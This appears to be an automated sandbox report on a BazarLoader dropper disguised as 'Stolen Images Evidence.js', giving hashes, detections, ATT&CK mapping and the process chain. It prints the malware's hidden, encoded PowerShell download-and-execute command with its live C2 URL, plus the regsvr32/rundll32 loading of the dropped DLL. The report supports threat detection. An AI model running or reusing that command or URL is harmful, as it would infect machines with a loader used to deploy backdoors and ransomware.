bazarloader | 3315cda85556f18f37f62bfea506267d38fa0f864e56017cd8315c73c290b12b

General

Target

Stolen Images Evidence.js
Size

18KB
MD5

e26be3479f0589233e8eb4c61ad4d8cb
SHA1

77828932f8427f43503e7c957a368d1ae2078c24
SHA256

251dba6ce4450b1ce3520ce63b79ea0ebc29e7b67276d4c9ca47ea6db264a612
SHA512

852b1c812ba10ea6fa16d510e1913fa10d765f5842ee1b4df1c449ba7b9ce2c4117ea53ea8858d54d1248cb6165cc995e71401ca65055d93f7763818a8df7be2

Score

10^/10

bazarloader dropper loader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://polidors.space/333g100/index.php

Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
loader dropper bazarloader

Bazar/Team9 Loader payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/536-66-0x0000000001DE0000-0x0000000001F98000-memory.dmp	BazarLoaderVar6
behavioral1/memory/1372-68-0x0000000001CD0000-0x0000000001E88000-memory.dmp	BazarLoaderVar6

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 792 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

regsvr32.exerundll32.exe

pid process

536 regsvr32.exe
1372 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

792 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 792 powershell.exe

flow	pid	process
5	792	powershell.exe

pid	process
536	regsvr32.exe
1372	rundll32.exe

pid	process
792	powershell.exe

description	pid	process
Token: SeDebugPrivilege	792	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

wscript.execmd.exepowershell.exe

description	pid	process	target process
PID 1620 wrote to memory of 1624	1620	wscript.exe	cmd.exe
PID 1620 wrote to memory of 1624	1620	wscript.exe	cmd.exe
PID 1620 wrote to memory of 1624	1620	wscript.exe	cmd.exe
PID 1624 wrote to memory of 792	1624	cmd.exe	powershell.exe
PID 1624 wrote to memory of 792	1624	cmd.exe	powershell.exe
PID 1624 wrote to memory of 792	1624	cmd.exe	powershell.exe
PID 792 wrote to memory of 536	792	powershell.exe	regsvr32.exe
PID 792 wrote to memory of 536	792	powershell.exe	regsvr32.exe
PID 792 wrote to memory of 536	792	powershell.exe	regsvr32.exe
PID 792 wrote to memory of 536	792	powershell.exe	regsvr32.exe
PID 792 wrote to memory of 536	792	powershell.exe	regsvr32.exe

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcABvAGwAaQBkAG8AcgBzAC4AcwBwAGEAYwBlAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
2⤵
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcABvAGwAaQBkAG8AcgBzAC4AcwBwAGEAYwBlAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:792

C:\Windows\System32\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\QdncBkW.dat
4⤵
- Loads dropped DLL
PID:536

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\QdncBkW.dat,DllRegisterServer {F5AF8965-203E-48CC-989D-190F3623E6B9}
1⤵
- Loads dropped DLL
PID:1372

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\QdncBkW.dat
MD5
4d176b4113296377ea1a9e2d662090fa

SHA1
d2c7be676546a241de4c10bba833846ae7b7e1c7

SHA256
e58d341e2d833971570db8c25ef61aa73c13d7ac11d2b31ff1f577a5e64f1d09

SHA512
33595db967810dd62d718b72253aabe14c606a9c9fa1d25707512b60806f61ff0a83daefa54ee18fed7408d5d564f9a0fac25a4bff8314e879d0a48026c371f7

Download Submit
\Users\Admin\AppData\Local\Temp\QdncBkW.dat
MD5
4d176b4113296377ea1a9e2d662090fa

SHA1
d2c7be676546a241de4c10bba833846ae7b7e1c7

SHA256
e58d341e2d833971570db8c25ef61aa73c13d7ac11d2b31ff1f577a5e64f1d09

SHA512
33595db967810dd62d718b72253aabe14c606a9c9fa1d25707512b60806f61ff0a83daefa54ee18fed7408d5d564f9a0fac25a4bff8314e879d0a48026c371f7

Download Submit
\Users\Admin\AppData\Local\Temp\QdncBkW.dat
MD5
4d176b4113296377ea1a9e2d662090fa

SHA1
d2c7be676546a241de4c10bba833846ae7b7e1c7

SHA256
e58d341e2d833971570db8c25ef61aa73c13d7ac11d2b31ff1f577a5e64f1d09

SHA512
33595db967810dd62d718b72253aabe14c606a9c9fa1d25707512b60806f61ff0a83daefa54ee18fed7408d5d564f9a0fac25a4bff8314e879d0a48026c371f7

Download Submit
memory/536-62-0x0000000000000000-mapping.dmp

Download
memory/536-66-0x0000000001DE0000-0x0000000001F98000-memory.dmp

Filesize
1.7MB

Download
memory/792-57-0x000007FEF23E0000-0x000007FEF2F3D000-memory.dmp

Filesize
11.4MB

Download
memory/792-60-0x0000000002864000-0x0000000002867000-memory.dmp

Filesize
12KB

Download
memory/792-61-0x000000000286B000-0x000000000288A000-memory.dmp

Filesize
124KB

Download
memory/792-59-0x0000000002862000-0x0000000002864000-memory.dmp

Filesize
8KB

Download
memory/792-58-0x0000000002860000-0x0000000002862000-memory.dmp

Filesize
8KB

Download
memory/792-55-0x0000000000000000-mapping.dmp

Download
memory/1372-68-0x0000000001CD0000-0x0000000001E88000-memory.dmp

Filesize
1.7MB

Download
memory/1620-53-0x000007FEFC4F1000-0x000007FEFC4F3000-memory.dmp

Filesize
8KB

Download
memory/1624-54-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing